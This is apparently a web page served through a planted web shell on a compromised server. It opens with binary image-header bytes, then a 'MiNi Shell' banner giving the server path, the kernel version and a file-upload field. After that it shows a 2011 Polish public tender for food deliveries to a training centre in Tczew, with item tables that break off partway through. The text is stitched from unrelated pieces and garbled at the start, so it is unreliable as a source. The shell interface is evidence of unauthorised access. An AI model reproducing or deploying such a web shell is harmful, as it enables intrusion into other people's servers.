JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111107/289807-N-2011.html

<p class="kh_header"><b>Gdańsk: Bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Tczewie w 2012 r.</b><br>
<b>Numer ogłoszenia: 289807 - 2011; data zamieszczenia: 07.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy - Pomorska Wojewódzka Komenda , ul. J. Uphagena 27, 80-237 Gdańsk, woj. pomorskie, tel. 58 3017916, faks 58 3017916.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.pomorskaohp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja rynku pracy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Tczewie w 2012 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest sukcesywna bezgotówkowa dostawa artykułów żywnościowych dla OSiW w Tczewie od 1 stycznia 2012 r. do dnia 31 grudnia 2012 roku do: Ośrodka Szkolenia i Wychowania w Tczewie, ul. Sobieskiego 10. 
      Przedmiot zamówienia podzielono na czternaście zadań częściowych:

Zadanie nr 1 - owoce świeże 
Zadanie nr 2 - owoce przetworzone  
Zadanie nr 3 - warzywa świeże 
Zadanie nr 4 - warzywa przetworzone 
Zadanie nr 5 - mrożonki 
Zadanie nr 6 - jaja
Zadanie nr 7 - mięso i produkty mięsne 
Zadanie nr 8 - ryby i przetwory konserwowe 
Zadanie nr 9 - produkty przemiału ziarna i skrobi - pieczywo 
Zadanie nr 10 - produkty skrobi - mąka  
Zadanie nr 11 - różne produkty spożywcze 
Zadanie nr 12- oleje i tłuszcze roślinne 
Zadanie nr 13 - produkty mleczarskie  
Zadanie nr 14 - napoje   
2) Dostawa będzie realizowana cyklicznie transportem Wykonawcy i na jego koszt do Ośrodka Szkolenia i Wychowania w Tczewie, ul. Sobieskiego 10 (dokładne miejsce na terenie OSiW Tczew wskazane będzie przez Zamawiającego po podpisaniu umowy).
3) Dostawca realizuje dostawy na własny koszt, transportem przystosowanym do tego celu i spełniającym niezbędne wymagania określone przepisami prawa obowiązującymi w tym zakresie. 
4) Każdy z artykułów powinien być dostarczony w wymaganych opakowaniach. Cykliczne dostawy  będą realizowane od poniedziałku do niedzieli w godzinach od  5.00 do   14.00. najpóźniej na drugi dzień od złożenia zapotrzebowania. Każdorazowa dostawa odbywa się na podstawie wcześniejszego zapotrzebowania określającego dokładną godzinę dostarczenia, datę dostarczenia, ilość, rodzaj artykułów, złożonego nawet w dniu poprzedzającym dostawę (pisemnie, faksem lub telefonicznie). 
Cykliczne dostawy  będą realizowane jak następuje:  
5) Zamawiający powiadomi telefonicznie Wykonawcę, o każdej dostawie oraz wskaże zamawiane artykuły z podaniem ilości.
6) Artykuły muszą spełniać normy jakościowe oraz muszą być dostarczone w ich początkowym okresie gwarancji.
7) Wykonawca powinien zachować odpowiednie warunki  transportu i przechowywania dostarczanego towaru. Każda dostawa artykułów wymagającego załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument. 
8) Wykonawca użyczy nieodpłatnie ewentualnie potrzebnych pojemników przy każdorazowej dostawie artykułów do siedziby Zamawiającego na okres do następnej dostawy.
9) Zamawiający zastrzega sobie prawo zamawiania mniejszej ilości towaru niż określona w ofercie.
Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu zmniejszenia      zamówienia. Wykonawcy będzie przysługiwało jedynie wynagrodzenie za zrealizowane dostawy bez naliczania kar umownych w razie zmniejszenia ilości dostaw.
10) W trakcie realizacji zamówienia Zamawiający zastrzega sobie możliwość zamiany proporcji ilościowych poszczególnego asortymentu w stosunku do podanego w formularzu ofertowym. 
11) Wykonawca ma obowiązek uznania reklamacji jakości i ilości dostarczanych artykułów i      dostarczenia nowej partii artykułów do siedziby  Zamawiającego  w dniu złożenia reklamacji.
12) Do składania zamówień Zamawiający upoważni wybranego pracownika.
13) Każda dostawa winna być ubezpieczona przez Wykonawcę na jego koszt w zakresie odpowiedzialności cywilnej.
14)W przypadku niedostarczenia towaru w wyznaczonym terminie i czasie lub dostarczenia towaru niezgodnie ze złożonym zapotrzebowaniem, Zamawiający zastrzega sobie prawo do zakupu niedostarczonego towaru, a kosztami zakupu (fakturą Vat) obciąży Wykonawcę. Zamawiający powiadomi o tym fakcie Wykonawcę telefonicznie i na piśmie.
15)Jeżeli w opisie przedmiotu zamówienia znajduje się jakikolwiek znak towarowy, patent czy pochodzenie - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie rozwiązań równoważnych o parametrach techniczno eksploatacyjno użytkowych nie gorszych niż te, podane pod pojęciem typu. 
16)Wykonawca ma obowiązek wystawiać faktury oddzielne na każde zadanie w ramach zamówienia cząstkowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.33.24.00-8, 15.30.00.00-1, 15.50.00.00-3, 15.43.00.00-1, 15.89.80.00-9, 03.21.00.00-6, 15.41.00.00-5, 15.13.10.00-5, 15.33.11.70-9, 03.22.00.00-9, 15.33.24.10-1, 15.22.00.00-6, 15.86.00.00-0, 15.87.00.00-0, 03.14.25.00-3, 15.30.00.00-1, 15.81.00.00-9, 15.00.00.00-8, 15.80.00.00-6, 15.13.11.11-9, 15.13.11.30-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od żądania wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca, wykaże, iż posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem niniejszego zamówienia na wartość co najmniej 50 000 zł (pięćdziesiąt tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>19) Zamawiający dopuszcza zmianę postanowień zawartej umowy w zakresie:
a) Zmian organizacyjnych stron np. zmiana reprezentacji lub siedziby firmy. 
b) Zmian osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej  umowy. 
c) W przypadku zmian unormowań prawnych powszechnie obowiązujących np. zmiana urzędowej stawki podatku VAT. W przypadku zmiany obowiązującej stawki podatku VAT, Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT. Strony dokonają odpowiedniej zmiany wynagrodzenia w przypadku realizacji tej części zamówienia, której w dniu zmiany stawki podatku VAT jeszcze nie dokonano.
d) W innych sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej umowy i mających charakter zmian nieistotnych tzn. takich, o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie lub na wynik postępowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pomorska.ohp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, ul. J. Uphagena 27, 80-237 Gdańsk
 ( pokój 610) 6 piętro,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.11.2011 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego, ul. J. Uphagena 27, 80-237 Gdańsk
 (sekretariat pokój 605) 6 piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 1 - owoce świeże								
	Rodzaj				cena	wartość  		wartość 
Lp	produktów	Nazwa	j.m	ilość	 Netto	netto [5 x 6]	VAT %	 brutto [7  x 8]
1	2	3	4	5	6	7	8	9
1		arbuz	kg	100				
2		banany	kg	150				
3		brzoskwinie	kg	80				
4		cytryny	kg	30				
6		gruszki	kg	60				
7		jabłka	kg	300				
8		kiwi	kg	11				
9	owoce	kiwi	szt	92				
10	świeże	nektaryny	kg	50				
11		maliny 500g	szt	8				
12		maliny	kg	8				
13		mandarynki	kg	80				
14		pomarancza	kg	60				
16		śliwki	kg	20				
17		truskawki	kg	30				
18		winogrona	kg	50				
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - owoce przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 2 - owoce przetworzone 								
	Rodzaj				cena	wartość  		wartość 
Lp	produktów	Nazwa	j.m	ilość	 Netto	netto [5 x 6]	VAT %	 brutto [7  x 8]
1	2	3	4	5	6	7	8	9
1		ananas konserwowany450g	szt	48				
2		brzoskwinie kons.0.9	szt	30				
3		Dżem 7 kg	szt	10				
4	owoce	Dżem  270g	szt	100				
5	przetworzone	kompot wiśniowy 0,9 l	szt	50				
6		sok owocowy 2l (różne smaki-pomarańcz	szt	30				
		grejfrut, jabłkowy, cz.pożeczka, mixitp)						
7		sok owocowy 1l (różne smaki-pomarań,	szt	45				
		gruszka, wiśnia, grejfrut,mix itp.)						
8		sok typu owocowy, warzywno -owocowe	szt	185				
		(marchew-trusk-banan, marchew-malina-						
		banan, marchew-jabł-banan itp.) 220ml						
9		syrop owocowy 6,5l	szt	40				
10		syrop owocowy 1l	szt	20				
11		rodzynki suszone 100g	szt	20				
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.24.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - warzywa świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 3 - warzywa świeże 								
	Rodzaj				cena	wartość  		wartość 
Lp	produktów	Nazwa	j.m	ilość	 Netto	netto [5x6]	VAT %	 brutto [7x8]
1	2	3	4	5	6	7	8	9
1		burak młody - botwina	szt	50				
2		burak	kg	250				
3		brokuł	szt	35				
4	WARZYWA	cebula	kg	350				
5	ŚWIEŻE	cebula czerwona 	kg	5				
6		czosnek	szt	25				
7		fasola drobna 5kg	szt	5				
8		fasola jaś	kg	25				
9		fasola szparagowa	kg	15				
10		groch łuska 0,5kg	szt	40				
11		kapusta czerwona	kg	20				
12		kapusta młoda 	szt	50				
13		kapusta 	kg	200				
14		kapusta pekińska	kg	80				
15		kapusta pekińska	szt	40				
16		kalafior	szt	65				
17		koper	szt	100				
18		koper duży	szt	15				
19		marchew młoda	kg	50				
20		marchew myta	kg	400				
21		ogórek świeży	kg	250				
22		papryka świeża	kg	80				
23		pietruszka korzeń	kg	20				
24		pomidor	kg	200				
25		por 	szt	40				
26		por 	kg	100				
27		rzodkiewka pęczki	szt	120				
28		sałata	szt	100				
29		seler	kg	190				
30		szczypiorek	szt	70				
31		zielenina natka	szt	250				
32		ziemniaki młode	kg	400				
33		ziemniaki 	kg	3000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 03.22.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 - warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 4 - warzywa przetworzone								
	Rodzaj				cena	wartość  		wartość 
Lp	produktów	Nazwa	j.m	ilość	 Netto [5x5]	netto	VAT %	 brutto [7x8]
1	2	3	4	5	6	7	8	9
1	warzywa	chrzan tarty 160g	szt	15				
2	przetw.	fasolka czerwona konserw.	szt	10				
3		groszek konserwowy 450g	szt	40				
4		groszek z marchewką 0,9l	szt	20				
5		kapusta kiszona  	kg	180				
6		koncentrat pomidorowy 0,9l - 1l	szt	55				
7		kukurydza konserwowa	szt	40				
8		ogórki kiszone 	kg	100				
9		ogórki małosolne	kg	15				
10		ogórki konserwowe 0,9l	szt	90				
11		papryka konserwowa 0,9l	szt	85				
12		pieczarka	kg	80				
13		pieczarka konserwowa 0,9l	szt	30				
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9, 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 - mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 5 - mrożonki 								
	Rodzaj				cena	wartość  		wartość 
Lp	produktów	Nazwa	j.m	ilość	 Netto	netto [5x6]	VAT %	 brutto [7x8]
1	2	3	4	5	6	7	8	9
1	mrożonki	brukselka mroż 0.5 kg	szt	20				
2		brokuły mroż. 2,5 kg	szt	8				
3		Frytki 2 kg	szt	20				
4		hamburger mrozony 	szt	180				
5		kalafior mroż	kg	25				
6		marchew kostka mroż	kg	50				
7		mieszanka kompotowa 	kg	15				
8		pizza 500g	szt	90				
9		pyzy z mięsem  	kg	70				
10		pyzy z owocami (knedle)	kg	60				
11		truskawki mrozone	kg	10				
12		warzywa na pat.chinskie	kg	10				
13		zapiekanka 200g	szt	135				
14		zupa wiosenna	kg	25				
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 - jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 6 - jaja									
					cena	wartość  		wartość 	
Lp	Rodzaj	Nazwa	j.m	ilość	 Netto	netto [5 x 6]	VAT %	 brutto [7  x 8]	
1	2	3	4	5	6	7	8	9	
1	produktów	jaja	szt	3500					
	zwierzęce- jaja								
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7 - mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie 7 mięso i produkty mięsne								
	Rodzaj				cena	wartość  		wartość 
Lp	produktów	Nazwa	j.m	ilość	 Netto 	netto[5x6]	VAT %	 brutto [7x8]
1	2	3	4	5	6	7	8	9
1		boczek świeży	kg	40				
2		boczek wędzony surowy	kg	90				
3		baleron wieprzowy	kg	50				
4		filet drobiowy z indyka	kg	18				
5		filet z piersi kurczaka	kg	110				
6		filet królewski z indyka lu równoważny	kg	50				
7		golonka wieprz b/k	kg	12				
8		karkówka wieprz b/k 	kg	100				
9	mięso	kiełbasa biała parzona	kg	20				
10	i produkty	kiełbasa biała  surowa	kg	20				
11	mięsne	kiełbasa szynkowa drobiowa	kg	120				
12		kiełbasa śląska lub równowazna	kg	70				
13		kiełbasa toruńska lub równowazna	kg	50				
14		kiełbasa typu ogniskowa lub równoważna	kg	60				
15		kiełbasa szynkowa wieprzowa	kg	150				
16		korpusy drobiowe(grzbiety)	kg	200				
17		kości wieprzowe	kg	100				
18		kotlet do hamburgera 250g	szt	90				
19		kiełbasa krakowska	kg	50				
20		łopatka b/k	kg	280				
21		metka cebulowa 200g	szt	90				
22		metka inna typu wiejska lub równowazna	kg	20				
23		mielonka konserwowa	kg	50				
24		mielonka śniadaniowa lub równowazna	kg	40				
25		mięso gulaszowe	kg	50				
26		mortadela	kg	30				
27		ogonówka 	kg	60				
28		parówka w folii	kg	50				
29		parówka wiedenska lub równowazna	kg	20				
30		pasztetowa  domowa lub równowazna	kg	50				
31		pasztet zapiekany	kg	15				
32		polędwica drobiowa	kg	80				
33		polędwica sopocka drobiowalub równowazna	kg	30				
34		przysmak w konserwie lub równowazny	kg	25				
35		przysmak śniadaniowy 130g	szt	45				
36		salami rodzinne lub równowazne	kg	9				
37		serdelki	kg	40				
38		schab wiep b/k	kg	70				
39		słonina	kg	6				
40		smaczek konserwowy lub równowazny	kg	40				
41		szynka mielona	kg	45				
42		szynka konserwowa 	kg	60				
43		szynka wiep b/k	kg	30				
44		szynka typu królewiecka mielo lub równowazna	kg	15				
45		szynka wieprzowa - wędlina	kg	30				
46		tyrolska lub równowazna	kg	35				
47		tyrolska puszka 300g lub równowazna	szt	45				
48		turystyczna lub równowazna	szt	45				
49		udka z kurczaka	kg	300				
50		wątroba drobiowa z kurczaka	kg	30				
51		wątroba wieprzowa	kg	35				
52		żeberka wiep	kg	30				
53		żołądki drobiowe	kg	30				
54		żywiecka lub podobne	kg	60				
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.90.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8 - ryby i przetwory konserwowe.</p>
